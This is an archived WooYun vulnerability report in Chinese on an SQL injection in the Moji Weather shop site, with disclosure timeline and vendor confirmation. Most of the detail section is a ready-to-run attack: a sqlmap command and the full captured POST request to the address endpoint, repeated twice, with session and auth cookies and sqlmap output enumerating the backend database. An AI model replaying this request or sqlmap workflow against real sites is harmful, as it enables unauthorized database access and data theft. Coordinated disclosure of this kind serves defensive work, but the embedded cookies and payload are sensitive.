当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0200335

漏洞标题:墨迹天气某处SQL注入

相关厂商:mojichina.com

漏洞作者: 黑色键盘丶

提交时间:2016-04-25 07:53

修复时间:2016-06-11 16:00

公开时间:2016-06-11 16:00

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2016-04-25: 细节已通知厂商并且等待厂商处理中
2016-04-27: 厂商已经确认,细节仅向厂商公开
2016-05-07: 细节向核心白帽子及相关领域专家公开
2016-05-17: 细节向普通白帽子公开
2016-05-27: 细节向实习白帽子公开
2016-06-11: 细节向公众公开

简要描述:

RT

详细说明:

post注入:sqlmap.py -r 1.txt --dbs      
-------------post数据包--------------------
POST /myshop/addnewaddress HTTP/1.1
Host: mall.moji.com
Proxy-Connection: keep-alive
Content-Length: 223
Accept: application/json
Origin: http://mall.moji.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
Content-Type: application/x-www-form-urlencoded
Referer: http://mall.moji.com/appmall/addmyaddress/303/0/0//30912644
Accept-Encoding: gzip,deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: 95c3_f2f1_saltkey=BnP2jU2i; 95c3_f2f1_lastvisit=1461512525; _gat=1; 95c3_f2f1_ulastactivity=007bVQljxo3T7iodgIY6kXKWLQYtnR0mUrYaTjRxDXBEsuc%2F5AWU; 95c3_f2f1_auth=8d28nu8ZL8lUxTNB38jCZtcm814riUpex1CN9Ul0DpNNNq%2BiFUY6NhqEtVTuLmxSjjg911m6O1ZPqz9J5svuEgrfzA; 95c3_f2f1_nofavfid=1; 95c3_f2f1_home_diymode=1; 95c3_f2f1_sid=lcN6TE; 95c3_f2f1_lastact=1461516316%09home.php%09spacecp; 95c3_f2f1_noticeTitle=1; PHPSESSID=tuepaaqgk46jkqsudff50c16r6; channel=default; 303=%7B%22buy_way%22%3A%220%22%2C%22way_id%22%3A%220%22%7D; goods_id=303; sku_total=1; product_size01=%E9%93%B6%E8%89%B2%E9%95%9C%E7%89%87; product_num=1; moji_sessionid=AES6D7177316B516A7A39316874306E4763612F4E4759513D3D; snsid=30912644; good_data_product_no=%5B%22303%22%5D; good_data_name_json=%5B%223M%5Cu62a4%5Cu76ee%5Cu955c1791T%5C%2F1790G%22%5D; product_price_json=%5B%2269.00%22%5D; shop_price_json=%5B%2299.00%22%5D; goods_ids=303; __ads_session=KIROnPAYtgie93EAKwA=; _ga=GA1.2.1391845924.1461516131; _yd_=GA1.3.451698722.1461516330; Hm_lvt_4bd2403ae3a05b9a989b28908b95bef5=1461516331,1461516647; Hm_lpvt_4bd2403ae3a05b9a989b28908b95bef5=1461516652; province=undefined; city=undefined; county=undefined
username=%E9%BB%91%E8%89%B2%E9%94%AE%E7%9B%98&province=%E4%B8%8A%E6%B5%B7%E5%B8%82&city=%E4%B8%8A%E6%B5%B7%E5%B8%82&district=%E5%AE%9D%E5%B1%B1%E5%8C%BA&addressDetail=11111&postcode=111111&mobile=13444455555&userid=30912644


数据库

available databases [1]:
[*] mojimall


1.png

漏洞证明:

post注入:sqlmap.py -r 1.txt --dbs     
-------------post数据包--------------------
POST /myshop/addnewaddress HTTP/1.1
Host: mall.moji.com
Proxy-Connection: keep-alive
Content-Length: 223
Accept: application/json
Origin: http://mall.moji.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
Content-Type: application/x-www-form-urlencoded
Referer: http://mall.moji.com/appmall/addmyaddress/303/0/0//30912644
Accept-Encoding: gzip,deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: 95c3_f2f1_saltkey=BnP2jU2i; 95c3_f2f1_lastvisit=1461512525; _gat=1; 95c3_f2f1_ulastactivity=007bVQljxo3T7iodgIY6kXKWLQYtnR0mUrYaTjRxDXBEsuc%2F5AWU; 95c3_f2f1_auth=8d28nu8ZL8lUxTNB38jCZtcm814riUpex1CN9Ul0DpNNNq%2BiFUY6NhqEtVTuLmxSjjg911m6O1ZPqz9J5svuEgrfzA; 95c3_f2f1_nofavfid=1; 95c3_f2f1_home_diymode=1; 95c3_f2f1_sid=lcN6TE; 95c3_f2f1_lastact=1461516316%09home.php%09spacecp; 95c3_f2f1_noticeTitle=1; PHPSESSID=tuepaaqgk46jkqsudff50c16r6; channel=default; 303=%7B%22buy_way%22%3A%220%22%2C%22way_id%22%3A%220%22%7D; goods_id=303; sku_total=1; product_size01=%E9%93%B6%E8%89%B2%E9%95%9C%E7%89%87; product_num=1; moji_sessionid=AES6D7177316B516A7A39316874306E4763612F4E4759513D3D; snsid=30912644; good_data_product_no=%5B%22303%22%5D; good_data_name_json=%5B%223M%5Cu62a4%5Cu76ee%5Cu955c1791T%5C%2F1790G%22%5D; product_price_json=%5B%2269.00%22%5D; shop_price_json=%5B%2299.00%22%5D; goods_ids=303; __ads_session=KIROnPAYtgie93EAKwA=; _ga=GA1.2.1391845924.1461516131; _yd_=GA1.3.451698722.1461516330; Hm_lvt_4bd2403ae3a05b9a989b28908b95bef5=1461516331,1461516647; Hm_lpvt_4bd2403ae3a05b9a989b28908b95bef5=1461516652; province=undefined; city=undefined; county=undefined
username=%E9%BB%91%E8%89%B2%E9%94%AE%E7%9B%98&province=%E4%B8%8A%E6%B5%B7%E5%B8%82&city=%E4%B8%8A%E6%B5%B7%E5%B8%82&district=%E5%AE%9D%E5%B1%B1%E5%8C%BA&addressDetail=11111&postcode=111111&mobile=13444455555&userid=30912644


数据库

available databases [1]:
[*] mojimall


1.png

修复方案:

过滤

版权声明:转载请注明来源 黑色键盘丶@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:6

确认时间:2016-04-27 15:52

厂商回复:

感谢提醒。

最新状态:

暂无